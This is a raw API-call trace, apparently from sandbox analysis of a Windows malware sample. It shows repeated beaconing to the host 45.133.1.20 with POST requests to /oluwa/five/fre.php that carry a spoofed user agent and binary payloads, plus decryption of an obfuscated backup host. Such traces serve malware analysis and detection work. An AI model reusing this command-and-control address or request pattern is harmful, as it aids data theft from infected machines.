0x77680000 [0172.020] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0172.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.022] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0172.022] GetProcessHeap () returned 0x6a0000 [0172.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0172.022] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9cd0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0172.022] GetProcessHeap () returned 0x6a0000 [0172.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0172.022] socket (af=2, type=1, protocol=6) returned 0x360 [0172.023] connect (s=0x360, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0172.053] FreeAddrInfoW (pAddrInfo=0x6b9cd0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0172.053] GetProcessHeap () returned 0x6a0000 [0172.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0172.053] GetProcessHeap () returned 0x6a0000 [0172.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0172.054] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.055] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.055] GetProcessHeap () returned 0x6a0000 [0172.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0172.056] GetProcessHeap () returned 0x6a0000 [0172.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.056] GetProcessHeap () returned 0x6a0000 [0172.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0172.056] GetProcessHeap () returned 0x6a0000 [0172.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0172.057] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.058] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.058] GetProcessHeap () returned 0x6a0000 [0172.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0172.058] GetProcessHeap () returned 0x6a0000 [0172.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.059] send (s=0x360, buf=0x6bbd20*, len=242, flags=0) returned 242 [0172.060] send (s=0x360, buf=0x6bb998*, len=159, flags=0) returned 159 [0172.060] GetProcessHeap () returned 0x6a0000 [0172.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0172.060] recv (in: s=0x360, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0172.149] GetProcessHeap () returned 0x6a0000 [0172.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0172.149] GetProcessHeap () returned 0x6a0000 [0172.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0172.150] GetProcessHeap () returned 0x6a0000 [0172.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0172.150] GetProcessHeap () returned 0x6a0000 [0172.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0172.151] closesocket (s=0x360) returned 0 [0172.151] GetProcessHeap () returned 0x6a0000 [0172.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0172.151] GetProcessHeap () returned 0x6a0000 [0172.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0172.154] GetProcessHeap () returned 0x6a0000 [0172.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0172.155] GetProcessHeap () returned 0x6a0000 [0172.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0172.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12d0) returned 0x360 [0172.157] Sleep (dwMilliseconds=0xea60) [0172.161] GetProcessHeap () returned 0x6a0000 [0172.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0172.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.163] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.180] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0172.191] GetProcessHeap () returned 0x6a0000 [0172.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9938 [0172.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.192] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b9938, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0172.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.195] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.197] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.200] GetProcessHeap () returned 0x6a0000 [0172.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9938 | out: hHeap=0x6a0000) returned 1 [0172.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.202] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0172.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.203] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0172.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.204] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0172.205] GetProcessHeap () returned 0x6a0000 [0172.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0172.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.206] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.207] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.208] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.210] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.210] GetProcessHeap () returned 0x6a0000 [0172.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0172.210] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0172.210] GetProcessHeap () returned 0x6a0000 [0172.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0172.213] GetProcessHeap () returned 0x6a0000 [0172.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0172.214] GetProcessHeap () returned 0x6a0000 [0172.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0172.214] GetProcessHeap () returned 0x6a0000 [0172.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0172.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.215] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.222] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0172.232] GetProcessHeap () returned 0x6a0000 [0172.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0172.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.237] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0172.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.238] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.240] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.240] GetProcessHeap () returned 0x6a0000 [0172.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0172.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.241] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0172.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.243] CryptDestroyKey (hKey=0x6ad520) returned 1 [0172.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.244] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0172.244] GetProcessHeap () returned 0x6a0000 [0172.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0172.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.261] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0172.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0172.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.263] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0172.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.264] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0172.267] GetProcessHeap () returned 0x6a0000 [0172.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0172.267] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9bb8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0172.268] GetProcessHeap () returned 0x6a0000 [0172.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0172.268] socket (af=2, type=1, protocol=6) returned 0x364 [0172.275] connect (s=0x364, name=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0172.305] FreeAddrInfoW (pAddrInfo=0x6b9bb8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0172.305] GetProcessHeap () returned 0x6a0000 [0172.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0172.305] GetProcessHeap () returned 0x6a0000 [0172.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0172.306] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.307] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.307] GetProcessHeap () returned 0x6a0000 [0172.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0172.307] GetProcessHeap () returned 0x6a0000 [0172.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.308] GetProcessHeap () returned 0x6a0000 [0172.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0172.308] GetProcessHeap () returned 0x6a0000 [0172.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0172.309] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.310] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.310] GetProcessHeap () returned 0x6a0000 [0172.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0172.310] GetProcessHeap () returned 0x6a0000 [0172.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.312] send (s=0x364, buf=0x6bbd20*, len=242, flags=0) returned 242 [0172.313] send (s=0x364, buf=0x6bb998*, len=159, flags=0) returned 159 [0172.313] GetProcessHeap () returned 0x6a0000 [0172.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0172.313] recv (in: s=0x364, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0172.403] GetProcessHeap () returned 0x6a0000 [0172.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0172.403] GetProcessHeap () returned 0x6a0000 [0172.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0172.405] GetProcessHeap () returned 0x6a0000 [0172.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0172.405] GetProcessHeap () returned 0x6a0000 [0172.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0172.405] closesocket (s=0x364) returned 0 [0172.406] GetProcessHeap () returned 0x6a0000 [0172.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0172.406] GetProcessHeap () returned 0x6a0000 [0172.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0172.407] GetProcessHeap () returned 0x6a0000 [0172.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0172.407] GetProcessHeap () returned 0x6a0000 [0172.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0172.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x56c) returned 0x364 [0172.410] Sleep (dwMilliseconds=0xea60) [0172.412] GetProcessHeap () returned 0x6a0000 [0172.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0172.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.414] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.435] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0172.488] GetProcessHeap () returned 0x6a0000 [0172.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0172.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.489] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0172.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.491] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.492] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.492] GetProcessHeap () returned 0x6a0000 [0172.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0172.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.493] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0172.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.494] CryptDestroyKey (hKey=0x6ad020) returned 1 [0172.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.495] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0172.495] GetProcessHeap () returned 0x6a0000 [0172.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0172.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.496] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.497] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.499] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.500] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.500] GetProcessHeap () returned 0x6a0000 [0172.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0172.500] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0172.500] GetProcessHeap () returned 0x6a0000 [0172.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0172.501] GetProcessHeap () returned 0x6a0000 [0172.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0172.501] GetProcessHeap () returned 0x6a0000 [0172.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0172.501] GetProcessHeap () returned 0x6a0000 [0172.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0172.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0172.516] GetProcessHeap () returned 0x6a0000 [0172.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0172.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.517] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0172.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.518] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.520] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.520] GetProcessHeap () returned 0x6a0000 [0172.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0172.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.594] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0172.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.595] CryptDestroyKey (hKey=0x6ad020) returned 1 [0172.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.596] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0172.596] GetProcessHeap () returned 0x6a0000 [0172.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0172.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.597] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0172.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.598] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0172.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.599] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0172.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.600] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0172.600] GetProcessHeap () returned 0x6a0000 [0172.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0172.600] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 